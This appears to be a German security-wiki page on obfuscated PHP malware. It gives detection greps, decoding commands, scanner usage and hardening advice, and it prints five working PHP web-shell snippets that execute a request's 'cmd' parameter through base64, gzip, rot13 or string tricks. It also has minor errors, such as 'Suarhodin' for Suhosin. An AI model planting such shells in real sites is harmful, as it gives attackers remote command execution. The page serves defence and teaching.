Thomas.will: Die Seite wurde neu angelegt: „== Obfuscated PHP Malware == === Beschreibung === Obfuskierter PHP-Code verschleiert seine eigentliche Funktion so, dass weder automatische Scanner noch mens…“

2026-05-31T17:19:35Z

Die Seite wurde neu angelegt: „== Obfuscated PHP Malware == === Beschreibung === Obfuskierter PHP-Code verschleiert seine eigentliche Funktion so, dass weder automatische Scanner noch mens…“

Neue Seite

== Obfuscated PHP Malware ==

=== Beschreibung ===

Obfuskierter PHP-Code verschleiert seine eigentliche Funktion so, dass weder automatische
Scanner noch menschliche Code-Reviews den Schadcode auf den ersten Blick erkennen.
Der Angreifer nutzt PHP-eigene Funktionen zur Laufzeitauswertung kombiniert mit
Encoding/Kompression, um Backdoors, Datendiebstahl oder Downloader zu verstecken.

Obfuskierung ist kein Angriff für sich – sie ist fast immer ''Tarnung für einen anderen
Angriffstyp'' (Web Shell, Credential Stealer, Remote Downloader).

=== Angreiferperspektive ===

==== Stufe 1: Einfaches Base64 + eval ====

<syntaxhighlight lang="php">
<?php
// Payload im Klartext:
// system($_GET['cmd']);

$payload = base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7');
eval($payload);
?>
</syntaxhighlight>

Dekodierung zur Analyse:

<syntaxhighlight lang="bash">
echo 'c3lzdGVtKCRfR0VUWydjbWQnXSk7' | base64 -d
# system($_GET['cmd']);
</syntaxhighlight>

==== Stufe 2: Mehrfach-Encoding (Base64 + gzip) ====

<syntaxhighlight lang="php">
<?php
// Payload: system($_GET['cmd']);
// Erst gzip-komprimiert, dann base64-kodiert

$encoded = 'H4sIAAAAAAAAA8tILUpVslIqS8wpTgUANbKBrA8AAAA=';
$payload = gzinflate(base64_decode($encoded));
eval($payload);
?>
</syntaxhighlight>

<syntaxhighlight lang="bash">
# Analyse-Einzeiler
echo 'H4sIAAAAAAAAA8tILUpVslIqS8wpTgUANbKBrA8AAAA=' | \
base64 -d | gunzip
# system($_GET['cmd']);
</syntaxhighlight>

==== Stufe 3: String-Rotation (str_rot13) ====

<syntaxhighlight lang="php">
<?php
// rot13("system") = "flfgrz"
$f = str_rot13('flfgrz'); // ergibt: system
$a = str_rot13('$_TRG[\'pzq\']'); // ergibt: $_GET['cmd']
eval('$f($a);');
?>
</syntaxhighlight>

==== Stufe 4: Verkettete Variable-Funktionsaufrufe ====

<syntaxhighlight lang="php">
<?php
// Vollständig verschleiert – kein klarer Funktionsname sichtbar
$a = 's' . 'y' . 's' . 't' . 'e' . 'm';
$b = '_' . 'G' . 'E' . 'T';
$$b = $_GET;
$a($$b['cmd']);
?>
</syntaxhighlight>

==== Stufe 5: Praxisbeispiel – Leafmailer-Webshell (wie im WordPress-Incident) ====

Solche Shells wurden z. B. in kompromittierten WordPress-Installationen als
scheinbar harmlose Mailer-Skripte getarnt:

<syntaxhighlight lang="php">
<?php
// Typisches Obfuskierungsmuster aus real aufgefundenen Webshells
// (vereinfacht dargestellt)
$x = str_replace('_', '', 'sy_st_em');
$y = @$_POST[base64_decode('Y21k')]; // base64("cmd") = "cmd"
if (isset($y)) { $x($y); }
?>
</syntaxhighlight>

<syntaxhighlight lang="bash">
echo 'Y21k' | base64 -d
# cmd
</syntaxhighlight>

=== Erkennungsmerkmale (Red Flags) ===

{| class="wikitable"
! Merkmal !! Risiko !! Erläuterung
|-
| <code>eval()</code> || '''Kritisch''' || Führt beliebigen PHP-Code zur Laufzeit aus
|-
| <code>base64_decode()</code> kombiniert mit <code>eval()</code> || '''Kritisch''' || Klassisches Obfuskierungsmuster
|-
| <code>gzinflate()</code>, <code>gzuncompress()</code> || Hoch || Komprimierter Payload
|-
| <code>str_rot13()</code> || Hoch || Einfache Zeichenrotation zur Tarnung
|-
| <code>assert()</code> || Hoch || Verhält sich wie <code>eval()</code>, wird seltener gefiltert
|-
| <code>create_function()</code> || Hoch || Veraltete Alternative zu anonymen Funktionen, oft in altem Malware-Code
|-
| Strings über 500 Zeichen ohne Leerzeichen || Mittel || Hinweis auf eingebetteten Encoded Payload
|-
| <code>preg_replace()</code> mit <code>/e</code>-Modifier || '''Kritisch''' || Führt Replacement-String als PHP-Code aus (PHP < 7.0)
|}

==== Filesystem-Scan nach Obfuskierungsmerkmalen ====

<syntaxhighlight lang="bash">
# eval() kombiniert mit base64_decode
grep -rn --include="*.php" \
-e "eval\s*(base64_decode" \
-e "eval\s*(gzinflate" \
-e "eval\s*(str_rot13" \
-e "assert\s*(\$" \
/var/www/html/

# Extrem lange Strings (Payload-Indikator)
grep -rn --include="*.php" \
-P '.{500,}' \
/var/www/html/ | grep -v ".min.php"

# create_function – fast nie legitim in modernem Code
grep -rn --include="*.php" "create_function" /var/www/html/
</syntaxhighlight>

==== Payload manuell dekodieren ====

<syntaxhighlight lang="bash">
# Unbekannten Base64-String dekodieren
echo 'UNBEKANNTER_STRING' | base64 -d

# Base64 + gzip
echo 'UNBEKANNTER_STRING' | base64 -d | gunzip 2>/dev/null || \
echo 'UNBEKANNTER_STRING' | base64 -d | zlib-flate -uncompress

# PHP-Oneliner zur schnellen Analyse (ohne eval auszuführen!)
php -r "echo base64_decode('UNBEKANNTER_STRING');"
php -r "echo gzinflate(base64_decode('UNBEKANNTER_STRING'));"
</syntaxhighlight>

==== Automatisierter Scan mit ClamAV und PDFM (Linux Malware Detect) ====

<syntaxhighlight lang="bash">
# ClamAV – PHP-Malware-Signaturen
apt install clamav
freshclam
clamscan -r --include="*.php" /var/www/html/

# Linux Malware Detect (Maldet)
wget https://www.rfxn.com/downloads/maldetect-current.tar.gz
tar xzf maldetect-current.tar.gz && cd maldetect-*/
./install.sh
maldet --scan-all /var/www/html/
maldet --report list
</syntaxhighlight>

=== Gegenmaßnahmen ===

==== eval() serverseitig verbieten ====

<syntaxhighlight lang="ini">
; /etc/php/8.2/apache2/php.ini
; Hinweis: eval() kann nicht über disable_functions deaktiviert werden
; – es ist ein Sprachkonstrukt, kein Funktionsaufruf.
; Stattdessen: Suarhodin-Extension oder open_basedir + strenge Dateirechte

disable_functions = assert, create_function, preg_replace
</syntaxhighlight>

; Hinweis zu eval(): Da <code>eval()</code> ein PHP-Sprachkonstrukt ist (kein Funktionsaufruf),
kann es nicht über <code>disable_functions</code> deaktiviert werden.
Abhilfe schaffen: Code-Reviews, statische Analyse und Integrity Monitoring.

==== Statische Analyse mit PHPCS Security Audit ====

<syntaxhighlight lang="bash">
composer require --dev pheromone/phpcs-security-audit
./vendor/bin/phpcs --standard=Security /var/www/html/
</syntaxhighlight>

==== open_basedir – Dateizugriff einschränken ====

<syntaxhighlight lang="ini">
; PHP darf nur innerhalb des Webroot auf Dateien zugreifen
open_basedir = /var/www/html:/tmp
</syntaxhighlight>

==== WAF-Regel: eval + base64 im Request-Body blockieren ====

<syntaxhighlight lang="apache">
# Coraza / ModSecurity
SecRule REQUEST_BODY "@rx eval\s*\(\s*base64_decode" \
"id:1002,phase:2,deny,status:403,msg:'Obfuscated PHP in Request'"
</syntaxhighlight>

=== Zusammenfassung ===

;Angreifer will: Schadcode so tarnen, dass Scanner und Code-Reviews ihn übersehen
;Typische Techniken: Base64, gzip, str_rot13, variable Funktionsnamen, mehrstufige Dekodierung
;Erkennbar durch: grep auf eval/assert/base64_decode, Längenanalyse, ClamAV/Maldet
;Prävention: disable_functions (assert, create_function), open_basedir, statische Analyse, Integrity Monitoring
;Wichtig: <code>eval()</code> selbst kann nicht per php.ini deaktiviert werden → Code-Review ist unverzichtbar

[[Kategorie:Web Security]]
[[Kategorie:PHP]]
[[Kategorie:Malware]]
[[Kategorie:Obfuskierung]]

Obfuscated PHP Malware - Versionsgeschichte

Thomas.will: Die Seite wurde neu angelegt: „== Obfuscated PHP Malware == === Beschreibung === Obfuskierter PHP-Code verschleiert seine eigentliche Funktion so, dass weder automatische Scanner noch mens…“